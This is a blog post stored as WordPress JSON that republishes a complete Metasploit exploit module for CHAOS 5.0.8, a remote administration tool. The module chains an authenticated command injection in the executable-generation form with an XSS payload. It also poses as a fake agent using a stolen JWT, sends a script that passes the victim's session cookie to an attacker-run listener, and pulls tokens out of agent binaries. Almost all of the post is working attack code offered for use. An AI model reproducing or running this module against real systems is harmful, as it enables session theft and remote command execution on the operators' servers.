{"id":56963,"date":"2024-05-21T21:59:53","date_gmt":"2024-05-21T17:59:53","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178654\/chaos_rat_xss_to_rce.rb.txt"},"modified":"2024-05-21T21:59:53","modified_gmt":"2024-05-21T17:59:53","slug":"chaos-5-0-8-cross-site-scripting-remote-command-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/chaos-5-0-8-cross-site-scripting-remote-command-execution\/","title":{"rendered":"CHAOS 5.0.8 Cross Site Scripting \/ Remote Command Execution"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking<\/p>\n

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Rex::Proto::Http::WebSocket<\/p>\n

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘Chaos RAT XSS to RCE’,
‘Description’ => %q{
CHAOS v5.0.8 is a free and open-source Remote Administration Tool that
allows generated binaries to control remote operating systems. The
webapp contains a remote command execution vulnerability which
can be triggered by an authenticated user when generating a new
executable. The webapp also contains an XSS vulnerability within
the view of a returned command being executed on an agent.<\/p>\n

Execution can happen through one of three routes:<\/p>\n

1. Provided credentials can be used to execute the RCE directly<\/p>\n

2. A JWT token from an agent can be provided to emulate a compromised
host. If a logged in user attempts to execute a command on the host
the returned value contains an xss payload.<\/p>\n

3. Similar to technique 2, an agent executable can be provided and the
JWT token can be extracted.<\/p>\n

Verified against CHAOS 7d5b20ad7e58e5b525abdcb3a12514b88e87cef2 running
in a docker container.
},
‘License’ => MSF_LICENSE,
‘Author’ => [
‘h00die’, # msf module
‘chebuya’ # original PoC, analysis
],
‘References’ => [
[ ‘URL’, ‘https:\/\/github.com\/chebuya\/CVE-2024-30850-chaos-rat-rce-poc’],
[ ‘URL’, ‘https:\/\/github.com\/tiagorlampert\/CHAOS’],
[ ‘CVE’, ‘2024-31839’], # XSS
[ ‘CVE’, ‘2024-30850’] # RCE
],
‘Platform’ => [‘linux’, ‘unix’],
‘Privileged’ => false,
‘Payload’ => { ‘BadChars’ => ‘ ‘ },
‘Arch’ => ARCH_CMD,
‘Targets’ => [
[ ‘Automatic Target’, {}]],
‘DefaultOptions’ => {
‘WfsDelay’ => 3_600, # 1hr
‘URIPATH’ => ‘\/’ # avoid long URLs in xss payloads
},
‘DisclosureDate’ => ‘2024-04-10’,
‘DefaultTarget’ => 0,
‘Notes’ => {
‘Stability’ => [CRASH_SAFE],
‘Reliability’ => [EVENT_DEPENDENT, REPEATABLE_SESSION],
‘SideEffects’ => [ARTIFACTS_ON_DISK]}
)
)
register_options(
[
Opt::RPORT(8080),
OptString.new(‘USERNAME’, [ false, ‘User to login with’]), # admin
OptString.new(‘PASSWORD’, [ false, ‘Password to login with’]), # admin
OptString.new(‘TARGETURI’, [ true, ‘The URI of the Chaos Application’, ‘\/’]),
OptString.new(‘JWT’, [ false, ‘Agent JWT Token of the malware’]),
OptPath.new(‘AGENT’, [ false, ‘A Chaos Agent Binary’])
])
register_advanced_options(
[
OptString.new(‘AGENT_HOSTNAME’, [ false, ‘Hostname for a fake agent’, ‘DC01’]),
OptString.new(‘AGENT_USERNAME’, [ false, ‘Username for a fake agent’, ‘Administrator’]),
OptString.new(‘AGENT_USERID’, [ false, ‘User ID for a fake agent’, ‘Administrator’]),
OptEnum.new(‘AGENT_OS’, [ false, ‘OS for a fake agent’, ‘Windows’, [‘Windows’, ‘Linux’]]),
])
end<\/p>\n

def on_request_uri(cli, request)
if request.method == ‘GET’ && @xss_response_received == false
vprint_status(‘Received GET request.’)
return unless request.uri.include? ‘=’<\/p>\n

cookie = request.uri.split(‘jwt=’)[1]print_good(“Received cookie: #{cookie}”)
send_response_html(cli, ”)
@xss_response_received = true
list_agents(cookie)
rce(cookie)
end
send_response_html(cli, ”)
end<\/p>\n

def mac_address
@mac_address ||= Faker::Internet.mac_address
@mac_address
end<\/p>\n

def check
res = send_request_cgi(
‘uri’ => normalize_uri(target_uri.path),
‘method’ => ‘GET’
)<\/p>\n

return CheckCode::Unknown(“#{peer} – Could not connect to web service – no response”) if res.nil?
return CheckCode::Safe(“#{peer} – Check URI Path, unexpected HTTP response code: #{res.code}”) if res.code == 200<\/p>\n

return CheckCode::Detected(‘Chaos application found’) if res.body.include?(‘<title>CHAOS<\/title>’)<\/p>\n

CheckCode::Safe(‘Chaos application not found’)
end<\/p>\n

def login
vprint_status(‘Attempting login’)
res = send_request_cgi(
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘auth’),
‘vars_post’ => {
‘username’ => datastore[‘USERNAME’],
‘password’ => datastore[‘PASSWORD’]}
)
fail_with(Failure::Unreachable, “#{peer} – Could not connect to web service – no response”) if res.nil?
fail_with(Failure::UnexpectedReply, “#{peer} – Invalid credentials (response code: #{res.code})”) unless res.code == 200
res.get_cookies.scan(\/jwt=([\\w._-]+);*\/).flatten[0] || ”
end<\/p>\n

def rce(cookie)
data = Rex::MIME::Message.new<\/p>\n

data.add_part(“http:\/\/localhost\\’$(#{payload.encoded})\\'”, nil, nil, ‘form-data; name=”address”‘)
data.add_part(‘8080’, nil, nil, ‘form-data; name=”port”‘)
data.add_part(‘1’, nil, nil, ‘form-data; name=”os_target”‘) # 1 windows, 2 linux
data.add_part(”, nil, nil, ‘form-data; name=”filename”‘)
data.add_part(‘false’, nil, nil, ‘form-data; name=”run_hidden”‘)<\/p>\n

post_data = data.to_s<\/p>\n

res = send_request_cgi(
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘generate’),
‘ctype’ => “multipart\/form-data; boundary=#{data.bound}”,
‘data’ => post_data,
‘cookie’ => “jwt=#{cookie}”
)
fail_with(Failure::Unreachable, “#{peer} – Could not connect to web service – no response”) if res.nil?
fail_with(Failure::UnexpectedReply, “#{peer} – Shellcode rejected: #{res.body}”) unless res.code == 200
end<\/p>\n

def convert_to_int_array(string)
string.bytes.to_a
end<\/p>\n

# Retrieve the server’s response and pull out the command response. The return value is
# the server’s response value (or 1 on failure).
def recv_wsframe_status(wsock)
res = wsock.get_wsframe
return 1 unless res<\/p>\n

begin
res_json = JSON.parse(res.payload_data)
rescue JSON::ParserError
fail_with(Failure::UnexpectedReply, ‘Failed to parse the returned JSON response.’)
end
command = res_json[‘command’]return 1 if command.nil?<\/p>\n

command
end<\/p>\n

def agent_command_handler(cookie)
vprint_status(‘WebSocket connecting to receive commands’)
headers = {
‘Cookie’ => “jwt=#{cookie}”,
‘X-Client’ => mac_address
}<\/p>\n

wsock = connect_ws(
‘uri’ => normalize_uri(target_uri.path, ‘client’),
‘headers’ => headers
)<\/p>\n

start_time = Time.now.to_i
command = 1
while Time.now.to_i < start_time + datastore[‘WfsDelay’]begin
Timeout.timeout(datastore[‘WfsDelay’]) do
command = recv_wsframe_status(wsock)
end
rescue Timeout::Error
command = 1
end<\/p>\n

next if command == 1<\/p>\n

vprint_good(“Received agent command ‘#{command}’, sending XSS in return”)<\/p>\n

data = {
‘client_id’ => mac_address,
# removed the rickroll from the PoC :(
‘response’ => convert_to_int_array(“<\/pre><script>var i = new Image;i.src=’http:\/\/#{datastore[‘SRVHOST’]}:#{datastore[‘SRVPORT’]}\/’+document.cookie;<\/script>”),
‘has_error’ => false
}
wsock.put_wsbinary(JSON.generate(data))
end
print_status(‘Stopping WebSocket connection’)
end<\/p>\n

def agent_callback_checkin(cookie)
start_time = Time.now.to_i
while Time.now.to_i < start_time + datastore[‘WfsDelay’]print_status(‘Performing Callback Checkin’)
res = send_request_cgi(
‘method’ => ‘GET’,
‘uri’ => normalize_uri(target_uri.path, ‘health’),
‘cookie’ => “jwt=#{cookie}”
)
fail_with(Failure::Unreachable, “#{peer} – Could not connect to web service – no response”) if res.nil?
fail_with(Failure::UnexpectedReply, “#{peer} – Checkin rejected: #{res.code}”) unless res.code == 200<\/p>\n

body = {
hostname: datastore[‘AGENT_HOSTNAME’],
username: datastore[‘AGENT_USERNAME’],
user_id: datastore[‘AGENT_USERID’],
os_name: datastore[‘AGENT_OS’],
os_arch: ‘amd64’,
mac_address: mac_address,
local_ip_address: datastore[‘SRVHOST’],
port: datastore[‘SRVPORT’].to_s,
fetched_unix: Time.now.to_i
}<\/p>\n

res = send_request_cgi(
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘device’),
‘cookie’ => “jwt=#{cookie}”,
‘data’ => body.to_json
)
fail_with(Failure::Unreachable, “#{peer} – Could not connect to web service – no response”) if res.nil?
fail_with(Failure::UnexpectedReply, “#{peer} – Checkin rejected: #{res.code}”) unless res.code == 200
Rex.sleep(30)
end
print_status(‘Stopping Callback Checkin’)
end<\/p>\n

def fake_agent(server_cookie)
# start callback checkins and command handler
@threads = []@threads << framework.threads.spawn(‘CHAOS-agent-callback’, false) do
agent_callback_checkin(server_cookie)
end
@threads << framework.threads.spawn(‘CHAOS-agent-command-handler’, false) do
agent_command_handler(server_cookie)
end
@threads.map do |t|
t.join
rescue StandardError => e
print_error(“Error in CHAOS Rat Threads: #{e}”)
end
end<\/p>\n

#
# Handle the HTTP request and return a response. Code borrowed from:
# msf\/core\/exploit\/http\/server.rb
#
def start_http_service(opts = {})
# Start a new HTTP server
@http_service = Rex::ServiceManager.start(
Rex::Proto::Http::Server,
(opts[‘ServerPort’] || bindport).to_i,
opts[‘ServerHost’] || bindhost,
datastore[‘SSL’],
{
‘Msf’ => framework,
‘MsfExploit’ => self
},
opts[‘Comm’] || _determine_server_comm(opts[‘ServerHost’] || bindhost),
datastore[‘SSLCert’],
datastore[‘SSLCompression’],
datastore[‘SSLCipher’],
datastore[‘SSLVersion’])
@http_service.server_name = datastore[‘HTTP::server_name’]# Default the procedure of the URI to on_request_uri if one isn’t
# provided.
uopts = {
‘Proc’ => method(:on_request_uri),
‘Path’ => resource_uri
}.update(opts[‘Uri’] || {})
proto = (datastore[‘SSL’] ? ‘https’ : ‘http’)<\/p>\n

netloc = opts[‘ServerHost’] || bindhost
http_srvport = (opts[‘ServerPort’] || bindport).to_i
if (proto == ‘http’ && http_srvport != 80) || (proto == ‘https’ && http_srvport != 443)
if Rex::Socket.is_ipv6?(netloc)
netloc = “[#{netloc}]:#{http_srvport}”
else
netloc = “#{netloc}:#{http_srvport}”
end
end
print_status(“Listening for XSS response on: #{proto}:\/\/#{netloc}#{uopts[‘Path’]}”)<\/p>\n

# Add path to resource
@service_path = uopts[‘Path’]@http_service.add_resource(uopts[‘Path’], uopts)
end<\/p>\n

def list_agents(cookie)
res = send_request_cgi(
‘uri’ => normalize_uri(target_uri.path, ‘devices’),
‘headers’ => {
‘cookie’ => “jwt=#{cookie}”
}
)
fail_with(Failure::Unreachable, “#{peer} – Could not connect to web service – no response”) if res.nil?
soup = Nokogiri::HTML(res.body)
rows = soup.css(‘tr’)<\/p>\n

agent_table = Rex::Text::Table.new(
‘Header’ => ‘Live Agents’,
‘Indent’ => 1,
‘Columns’ =>
[
‘IP’,
‘OS’,
‘Username’,
‘Hostname’,
‘MAC’
])<\/p>\n

rows.each do |row|
cells = row.css(‘td’)
next if cells.length != 7<\/p>\n

agent_ip = cells[4].text.strip
hostname = cells[1].text.strip<\/p>\n

agent_table << [agent_ip, cells[3].text.strip, cells[2].text.strip, hostname, cells[5].text.strip]report_host(host: agent_ip, name: hostname, os_name: cells[3].text.strip, info: “CHAOS C2 Agent Deployed, callback: #{datastore[‘RHOST’]}”)
end
print_good(‘Detected Agents’)
print_line(agent_table.to_s)
end<\/p>\n

def exploit
unless (datastore[‘USERNAME’] && datastore[‘PASSWORD’]) ||
datastore[‘JWT’] ||
datastore[‘AGENT’]fail_with(Failure::BadConfig, ‘Username and password, or JWT, or AGENT path required’)
end
fail_with(Failure::BadConfig, ‘SRVHOST can not be 0.0.0.0, must be a valid IP address’) if Rex::Socket.addr_atoi(datastore[‘SRVHOST’]) == 0<\/p>\n

@xss_response_received = false<\/p>\n

if datastore[‘USERNAME’] && datastore[‘PASSWORD’]print_status(‘Attempting exploitation through direct login’)
cookie = login
rce(cookie)
elsif datastore[‘JWT’]print_status(‘Attempting exploitation through JWT token’)
vprint_status(“Fake MAC for agent: #{mac_address}”)
start_http_service
fake_agent(datastore[‘JWT’])
elsif datastore[‘AGENT’]print_status(‘Attempting exploitation through Agent’)
fail_with(Failure::BadConfig, ‘AGENT file not found’) unless File.file?(datastore[‘AGENT’])
agent_exe = File.read(datastore[‘AGENT’])
if agent_exe =~ \/main\\.ServerAddress=(((25[0-5]|(2[0-4]|1\\d|[1-9]|)\\d)\\.?\\b){4})\/
server_address = ::Regexp.last_match(1)
vprint_status(“Server address: #{server_address}”)
end<\/p>\n

if agent_exe =~ \/main\\.Port=(\\d{1,6})\/
server_port = ::Regexp.last_match(1)
vprint_status(“Server port: #{server_port}”)
end<\/p>\n

if agent_exe =~ %r{main\\.Token=([a-zA-Z0-9_.\\-+\/=]*\\.[a-zA-Z0-9_.\\-+\/=]*\\.[a-zA-Z0-9_.\\-+\/=]*)}
server_cookie = ::Regexp.last_match(1)
vprint_status(“Server JWT Token: #{server_cookie}”)
end
fail_with(Failure::BadConfig, ‘JWT token not found in agent executable’) unless server_cookie
vprint_status(“Fake MAC for agent: #{mac_address}”)
start_http_service
fake_agent(server_cookie)
end
end<\/p>\n

def cleanup
# Clean and stop HTTP server
if @http_service
begin
@http_service.remove_resource(datastore[‘URIPATH’])
@http_service.deref
@http_service.stop
@http_service = nil
rescue StandardError => e
print_error(“Failed to stop http server due to #{e}”)
end
end
@threads.each(&:kill) unless @threads.nil? # no need for these anymore
super
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheckinclude Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::Remote::HttpServer::HTMLinclude Rex::Proto::Http::WebSocket def initialize(info = {})super(update_info(info,‘Name’ => ‘Chaos RAT XSS to RCE’,‘Description’ => %q{CHAOS v5.0.8 is a free and open-source Remote Administration Tool thatallows generated binaries to control remote operating systems. Thewebapp contains a remote command execution …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56963","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56963","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56963"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56963\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56963"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56963"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56963"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}